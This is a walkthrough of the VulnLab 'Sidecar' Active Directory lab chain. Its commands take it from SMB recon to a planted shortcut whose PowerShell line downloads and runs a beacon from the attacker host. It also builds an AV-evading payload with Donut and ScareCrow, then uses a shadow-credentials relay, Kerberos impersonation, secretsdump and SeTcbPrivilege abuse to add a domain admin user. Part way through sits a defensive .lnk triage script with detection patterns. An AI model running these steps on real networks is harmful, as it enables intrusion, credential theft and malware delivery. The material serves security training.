VulnLab Sidecar

Sidecar

Recon

└─$ rustscan -g -a 10.10.180.53,10.10.180.54 -r 1-65535
10.10.180.53 -> [53,88,135,139,389,445,464,3268,3269,3389,5985,49664,49667,49669,49670]
10.10.180.54 -> [135,139,445,3389,49408,49409,49410,49411,49412,49414,49417,49418]
└─$ nmap -sC -sV -p53,88,135,139,389,445,464,3268,3269,3389,5985,49664,49667,49669,49670 10.10.180.53
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-19 20:18 +05
Nmap scan report for 10.10.180.53
Host is up (0.13s latency).

PORT      STATE    SERVICE          VERSION
53/tcp    open     tcpwrapped
88/tcp    open     tcpwrapped
135/tcp   open     tcpwrapped
139/tcp   filtered netbios-ssn
389/tcp   filtered ldap
445/tcp   filtered microsoft-ds
464/tcp   filtered kpasswd5
3268/tcp  filtered globalcatLDAP
3269/tcp  filtered globalcatLDAPssl
3389/tcp  open     ms-wbt-server    Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: SIDECAR
|   NetBIOS_Domain_Name: SIDECAR
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: Sidecar.vl
|   DNS_Computer_Name: DC01.Sidecar.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-01-19T15:17:48+00:00
|_ssl-date: 2025-01-19T15:18:03+00:00; -1m20s from scanner time.
| ssl-cert: Subject: commonName=DC01.Sidecar.vl
| Not valid before: 2025-01-18T15:11:41
|_Not valid after:  2025-07-20T15:11:41
5985/tcp  filtered wsman
49664/tcp filtered unknown
49667/tcp filtered unknown
49669/tcp open     msrpc            Microsoft Windows RPC
49670/tcp open     msrpc            Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1m20s, deviation: 0s, median: -1m20s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.01 seconds
└─$ nmap -sC -sV -p135,139,445,3389,49408,49409,49410,49411,49412,49414,49417,49418 10.10.180.54
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-19 20:18 +05
Nmap scan report for 10.10.180.54
Host is up (0.18s latency).

PORT      STATE    SERVICE            VERSION
135/tcp   open     tcpwrapped
139/tcp   open     netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds       Windows 10 Enterprise 10240 microsoft-ds (workgroup: SIDECAR)
3389/tcp  open     ssl/ms-wbt-server?
|_ssl-date: 2025-01-19T15:18:21+00:00; -1m21s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: SIDECAR
|   NetBIOS_Domain_Name: SIDECAR
|   NetBIOS_Computer_Name: WS01
|   DNS_Domain_Name: Sidecar.vl
|   DNS_Computer_Name: ws01.Sidecar.vl
|   DNS_Tree_Name: Sidecar.vl
|   Product_Version: 10.0.10240
|_  System_Time: 2025-01-19T15:18:06+00:00
| ssl-cert: Subject: commonName=ws01.Sidecar.vl
| Not valid before: 2025-01-18T15:13:47
|_Not valid after:  2025-07-20T15:13:47
49408/tcp filtered unknown
49409/tcp filtered unknown
49410/tcp filtered unknown
49411/tcp filtered unknown
49412/tcp filtered unknown
49414/tcp filtered unknown
49417/tcp filtered unknown
49418/tcp filtered unknown
Service Info: Host: WS01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows 10 Enterprise 10240 (Windows 10 Enterprise 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: ws01
|   NetBIOS computer name: WS01\x00
|   Domain name: Sidecar.vl
|   Forest name: Sidecar.vl
|   FQDN: ws01.Sidecar.vl
|_  System time: 2025-01-19T16:18:06+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -13m20s, deviation: 26m49s, median: -1m21s
| smb2-time: 
|   date: 2025-01-19T15:18:08
|_  start_date: 2025-01-19T15:13:48
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.33 seconds

WS01.Sidecar.vl

Let’s check whether the Guest account is enabled:

└─$ nxc smb targets.txt -u 'Guest' -p '' --shares
SMB         10.10.180.54    445    WS01             [*] Windows 10 Enterprise 10240 x64 (name:WS01) (domain:Sidecar.vl) (signing:False) (SMBv1:True)
SMB         10.10.180.53    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:Sidecar.vl) (signing:True) (SMBv1:False)
SMB         10.10.180.54    445    WS01             [+] Sidecar.vl\Guest: (Guest)
SMB         10.10.180.53    445    DC01             [+] Sidecar.vl\Guest: 
SMB         10.10.180.54    445    WS01             [*] Enumerated shares
SMB         10.10.180.54    445    WS01             Share           Permissions     Remark
SMB         10.10.180.54    445    WS01             -----           -----------     ------
SMB         10.10.180.54    445    WS01             ADMIN$                          Remote Admin
SMB         10.10.180.54    445    WS01             C$                              Default share
SMB         10.10.180.54    445    WS01             IPC$                            Remote IPC
SMB         10.10.180.53    445    DC01             [*] Enumerated shares
SMB         10.10.180.53    445    DC01             Share           Permissions     Remark
SMB         10.10.180.53    445    DC01             -----           -----------     ------
SMB         10.10.180.53    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.180.53    445    DC01             C$                              Default share
SMB         10.10.180.53    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.180.53    445    DC01             NETLOGON                        Logon server share 
SMB         10.10.180.53    445    DC01             Public          READ,WRITE      
SMB         10.10.180.53    445    DC01             SYSVOL                          Logon server share 
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

We can run spider_plus to check the content of the shares:

└─$ nxc smb 10.10.180.53 -u 'Guest' -p '' -M spider_plus -o EXCLUDE_DIR=IPC$,NETLOGON,SYSVOL
SMB         10.10.180.53    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:Sidecar.vl) (signing:True) (SMBv1:False)
SMB         10.10.180.53    445    DC01             [+] Sidecar.vl\Guest: 
SPIDER_PLUS 10.10.180.53    445    DC01             [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.180.53    445    DC01             [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.180.53    445    DC01             [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.180.53    445    DC01             [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.180.53    445    DC01             [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.180.53    445    DC01             [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.180.53    445    DC01             [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.10.180.53    445    DC01             [*] Enumerated shares
SMB         10.10.180.53    445    DC01             Share           Permissions     Remark
SMB         10.10.180.53    445    DC01             -----           -----------     ------
SMB         10.10.180.53    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.180.53    445    DC01             C$                              Default share
SMB         10.10.180.53    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.180.53    445    DC01             NETLOGON                        Logon server share 
SMB         10.10.180.53    445    DC01             Public          READ,WRITE      
SMB         10.10.180.53    445    DC01             SYSVOL                          Logon server share 
SPIDER_PLUS 10.10.180.53    445    DC01             [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.180.53.json".
SPIDER_PLUS 10.10.180.53    445    DC01             [*] SMB Shares:           6 (ADMIN$, C$, IPC$, NETLOGON, Public, SYSVOL)
SPIDER_PLUS 10.10.180.53    445    DC01             [*] SMB Readable Shares:  2 (IPC$, Public)
SPIDER_PLUS 10.10.180.53    445    DC01             [*] SMB Writable Shares:  1 (Public)
SPIDER_PLUS 10.10.180.53    445    DC01             [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.10.180.53    445    DC01             [*] Total folders found:  5
SPIDER_PLUS 10.10.180.53    445    DC01             [*] Total files found:    4
SPIDER_PLUS 10.10.180.53    445    DC01             [*] File size average:    1.25 KB
SPIDER_PLUS 10.10.180.53    445    DC01             [*] File size min:        45 B
SPIDER_PLUS 10.10.180.53    445    DC01             [*] File size max:        1.7 KB

The collected share-file metadata:

{
    "Public": {
        "Common/Common.lnk": {
            "atime_epoch": "2023-12-10 20:47:04",
            "ctime_epoch": "2023-12-10 20:23:50",
            "mtime_epoch": "2023-12-17 17:10:17",
            "size": "1.7 KB"
        },
        "Common/Custom/info.txt": {
            "atime_epoch": "2023-12-10 22:08:38",
            "ctime_epoch": "2023-12-10 22:07:43",
            "mtime_epoch": "2023-12-17 17:10:06",
            "size": "45 B"
        },
        "Common/Install.lnk": {
            "atime_epoch": "2023-12-10 20:47:05",
            "ctime_epoch": "2023-12-10 20:25:45",
            "mtime_epoch": "2023-12-17 17:10:17",
            "size": "1.63 KB"
        },
        "Common/Transfer.lnk": {
            "atime_epoch": "2023-12-10 20:47:05",
            "ctime_epoch": "2023-12-10 20:25:47",
            "mtime_epoch": "2023-12-17 17:10:17",
            "size": "1.64 KB"
        }
    }
}

We see that the Custom folder is meant for links and shortcuts:

# cd Common
# cd Custom
# ls
drw-rw-rw-          0  Sun Dec 17 17:14:14 2023 .
drw-rw-rw-          0  Sun Dec 17 17:09:39 2023 ..
-rw-rw-rw-         45  Sun Dec 17 17:10:06 2023 info.txt
# cat info.txt
Folder for custom shortcuts & internet links.
# 

Let’s try capturing a hash:

└─$ python3 ~/tools/red-team/ntlm_theft/ntlm_theft.py -g lnk -s 10.8.4.147 -f sidecar 
Created: sidecar/sidecar.lnk (BROWSE TO FOLDER)
Generation Complete.
# put sidecar/sidecar.lnk
#

It doesn’t work. The wiki specifies that a user clicks shortcut files. There’s a tool, LNKUp, that can generate a malicious shortcut with command execution, or we can generate one ourselves:

C:\Windows\System32\cmd.exe /c net use p: \\10.8.4.147\a

To create the lnk file using LNKUp:

└─$ python2.7 generate.py --execute "C:\Windows\System32\cmd.exe /c powershell -c iwr http://10.8.4.147:8000/demon.exe -o C:\windows\tasks\demon.exe; C:\windows\tasks\demon.exe" --output clickme.lnk --host 10.8.4.147 --type ntlm
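From the defender's side, shortcuts like the one above are cheap to triage offline by parsing their MS-SHLLINK StringData. The following is an added example, not part of the original writeup or of LNKUp: a small Python parser that reads a .lnk's relative path, arguments and icon location and flags UNC paths, `net use` and command interpreters; the sample shortcuts are constructed in-script as fixtures (hypothetical `make_sample_lnk` helper), so nothing is fetched from a share.

```python
"""Triage Windows shortcut (.lnk) files for the patterns abused in the writeup."""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000C000000000000046")   # {00021401-...-46}
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData fields in on-disk order, with the LinkFlags bit that enables each.
STRING_FIELDS = [("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
                 ("arguments", 0x20), ("icon_location", 0x40)]

SUSPICIOUS = [
    (r"\\\\[\w.\-]+\\", "UNC path (may leak NetNTLM to a remote host)"),
    (r"(?i)\bnet\s+use\b", "net use against a remote share"),
    (r"(?i)powershell|cmd\.exe\s+/c|mshta|rundll32", "command interpreter as target"),
    (r"(?i)\b(iwr|invoke-webrequest|curl|certutil)\b.*https?://", "download from URL"),
]


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link; raise ValueError if malformed."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C                                   # end of the 76-byte ShellLinkHeader
    if flags & HAS_ID_LIST:                      # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def triage(data: bytes) -> list:
    """Reasons the shortcut looks suspicious; an empty list means nothing was flagged."""
    fields = parse_lnk(data)
    text = " ".join(fields.get(k, "") for k in ("relative_path", "arguments", "icon_location"))
    return [why for pat, why in SUSPICIOUS if re.search(pat, text)]


def make_sample_lnk(relative_path: str, arguments: str = "") -> bytes:
    """Constructed test fixture: a minimal Unicode .lnk with no IDList or LinkInfo."""
    flags = IS_UNICODE | 0x08 | (0x20 if arguments else 0)
    header = (struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
              + bytes(36) + struct.pack("<I", 1) + bytes(12))   # ShowCommand = SW_SHOWNORMAL
    body = b""
    for s in [relative_path] + ([arguments] if arguments else []):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


if __name__ == "__main__":
    # Constructed samples: a benign editor shortcut and one shaped like the writeup's.
    benign = make_sample_lnk("..\\..\\Program Files\\Notepad++\\notepad++.exe")
    bad = make_sample_lnk("..\\..\\Windows\\System32\\cmd.exe", "/c net use p: \\\\10.8.4.147\\a")
    for label, blob in (("benign", benign), ("suspicious", bad)):
        print(label, parse_lnk(blob), triage(blob))
```

Running it over every `*.lnk` collected from a share (or from a spider_plus download) gives a first-pass list of shortcuts worth a closer look.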

We receive a connection on Responder, but the hash is not crackable.

The beacon is also downloaded, but AV kills it.

We could also use a PowerShell reverse shell to get access.

Let’s create an evasive beacon using Donut and ScareCrow:

└─$ ./donut -i ~/vulnlab/chains/sidecar/demon.exe -a x64 -o ~/vulnlab/chains/sidecar/payload.bin

  [ Donut shellcode generator v1 (built Oct 23 2024 07:56:47)
  [ Copyright (c) 2019-2021 TheWover, Odzhan

WARNING: Invalid architecture specified: 0 -- setting to x86+amd64
  [ Instance type : Embedded
  [ Module file   : "/home/kali/vulnlab/chains/sidecar/demon.exe"
  [ Entropy       : Random names + Encryption
  [ File type     : EXE
  [ Target CPU    : x86+amd64
  [ AMSI/WDLP/ETW : continue
  [ PE Headers    : overwrite
  [ Shellcode     : "/home/kali/vulnlab/chains/sidecar/payload.bin"
  [ Exit          : Thread

└─$ ./ScareCrow/ScareCrow -I  ~/vulnlab/chains/sidecar/payload.bin --domain microsoft.com -outpath  ~/vulnlab/chains/sidecar/
 
  _________                           _________                       
 /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __
 \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /
 /        \  \___ / __ \|  | \/\  ___/\     \____|  | \(  <_> )     / 
/_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/  
        \/     \/     \/            \/        \/                      
                                                        (@Tyl0us)
        “Fear, you must understand is more than a mere obstacle. 
        Fear is a TEACHER. the first one you ever had.”

[*] Encrypting Shellcode Using ELZMA Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[+] Patched AMSI Enabled
[+] Sleep Timer set for 2699 milliseconds 
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With cmd's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing cmd.exe With a Fake Cert
[+] Signed File Created
[+] Binary Compiled
[!] Sha256 hash of cmd.exe: 1d989fb0d5a71624bc57d69213d84bfe1ae5929ae3614483a33382f718a49230
[*] cmd.exe moved to /home/kali/vulnlab/chains/sidecar/

Download and run it.

I noticed that using Donut triggers Windows Defender, so I had to generate Windows shellcode and feed it directly to ScareCrow (also setting a 10s sleep, Ekko and indirect syscalls). Let’s enumerate the domain with BloodHound.

Nothing interesting for the current user. It seems there’s also ADCS (the Cert Publishers group in BloodHound, or run certutil). We can try performing an RBCD or Shadow Credentials attack to take over WS01. First we need to check MachineAccountQuota.

It seems we can’t create a fake computer account, so let’s perform the Shadow Credentials attack instead:

  • https://www.fortalicesolutions.com/posts/shadow-credentials-workstation-takeover-edition

To perform it we need to relay from HTTP to LDAP, so we need to check whether WebDAV is enabled on the machine. We can use GetWebDAVStatus.

It’s not. We have to start it.

Now we need to manipulate DNS records by adding our attacker host. We can use UnmanagedPowerShell or Sharpmad.

Now we can perform the relay attack, coercing authentication with SpoolSample. Start ntlmrelayx first:

└─$ ntlmrelayx.py -t ldap://dc01.sidecar.vl --shadow-credentials --shadow-target 'ws01$' --no-dump --no-da 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Now coerce.

We receive a connection.

Now we can use PKINITtools to continue. Get a TGT:

└─$ python3 ~/tools/red-team/PKINITtools/gettgtpkinit.py -cert-pfx rGHT11yH.pfx -pfx-pass zAkBJFsgFVMuCHZAoyD3 Sidecar.vl/ws01$ rGHT11yH.ccache
2025-01-20 01:36:49,115 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-01-20 01:36:49,127 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-01-20 01:37:03,916 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-01-20 01:37:03,917 minikerberos INFO     0582b10645710e1bda8cac4c06c3729bc252feef8e6cd0dbb63809db7ebfa709
INFO:minikerberos:0582b10645710e1bda8cac4c06c3729bc252feef8e6cd0dbb63809db7ebfa709
2025-01-20 01:37:03,919 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

Retrieve the NT hash using the TGT, just in case:

└─$ KRB5CCNAME=rGHT11yH.ccache python3 ~/tools/red-team/PKINITtools/getnthash.py -key 0582b10645710e1bda8cac4c06c3729bc252feef8e6cd0dbb63809db7ebfa709 sidecar.vl/ws01$
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Using TGT from cache
/home/kali/tools/red-team/PKINITtools/getnthash.py:144: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/home/kali/tools/red-team/PKINITtools/getnthash.py:192: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting ticket to self with PAC
Recovered NT Hash
<REDACTED>

Impersonate the administrator:

└─$ python3 ~/tools/red-team/PKINITtools/gets4uticket.py kerberos+ccache://sidecar.vl\\ws01\$:rGHT11yH.ccache@dc01.sidecar.vl cifs/ws01.sidecar.vl@sidecar.vl administrator@sidecar.vl administratr.ccache -v           
2025-01-20 01:40:33,686 minikerberos INFO     Trying to get SPN with administrator@sidecar.vl for cifs/ws01.sidecar.vl@sidecar.vl
INFO:minikerberos:Trying to get SPN with administrator@sidecar.vl for cifs/ws01.sidecar.vl@sidecar.vl
2025-01-20 01:40:33,878 minikerberos INFO     Success!
INFO:minikerberos:Success!
2025-01-20 01:40:33,878 minikerberos INFO     Done!
INFO:minikerberos:Done!

Dump secrets:

└─$ KRB5CCNAME=administratr.ccache secretsdump.py -k -no-pass ws01.sidecar.vl 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1e7d0e7d432413f4ac3097f112b17322
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>
SIDECAR\WS01$:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>

DC01.Sidecar.vl

We dumped the hash for the Deployer account, which could be related to the svc_deploy domain account, which has PSRemote privileges.

We can crack it with CrackStation.

Let’s check for password reuse with svc_deploy:<REDACTED>

└─$ nxc smb 10.10.180.53 -u 'svc_deploy' -p '<REDACTED>'
SMB         10.10.180.53    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:Sidecar.vl) (signing:True) (SMBv1:False)
SMB         10.10.180.53    445    DC01             [+] Sidecar.vl\svc_deploy:<REDACTED> 
└─$ nxc winrm 10.10.180.53 -u 'svc_deploy' -p '<REDACTED>'
WINRM       10.10.180.53    5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:Sidecar.vl)
WINRM       10.10.180.53    5985   DC01             [+] Sidecar.vl\svc_deploy:<REDACTED> (Pwn3d!)

Now we can connect to the DC using evil-winrm and check privileges:

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /all

USER INFORMATION
----------------

User Name          SID
================== =============================================
sidecar\svc_deploy S-1-5-21-3976908837-939936849-1028625813-1610


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
SIDECAR\Installer                          Group            S-1-5-21-3976908837-939936849-1028625813-1611 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeTcbPrivilege                Act as part of the operating system Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

We have SeTcbPrivilege, so we can use this PoC:

*Evil-WinRM* PS C:\ProgramData> upload ../../../tools/red-team/c2-toolkit/SeTcbPrivilege.exe
                                        
Info: Uploading /home/kali/vulnlab/chains/sidecar/../../../tools/red-team/c2-toolkit/SeTcbPrivilege.exe to C:\ProgramData\SeTcbPrivilege.exe
                                        
Data: 17064 bytes of 17064 bytes copied
                                        
Info: Upload successful!

*Evil-WinRM* PS C:\ProgramData> .\SeTcbPrivilege.exe pwn "C:\Windows\System32\cmd.exe /c net user pentest P@ssw0rd /add && net localgroup administrators pentest /add"
Error starting service 1053
*Evil-WinRM* PS C:\ProgramData> net user

User accounts for \\

-------------------------------------------------------------------------------
A.Roberts                Administrator            E.Klaymore
Guest                    J.Chaffrey               krbtgt
M.smith                  O.osvald                 P.robinson
pentest                  svc_deploy
The command completed with one or more errors.

Connect as the newly created user:

└─$ evil-winrm -i dc01.sidecar.vl -u 'pentest' -p 'P@ssw0rd'   
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\pentest\Documents>

https://api.vulnlab.com/api/v1/share?id=771e8a34-950c-4913-a5ee-6bec30caac05

This post is licensed under CC BY 4.0 by the author.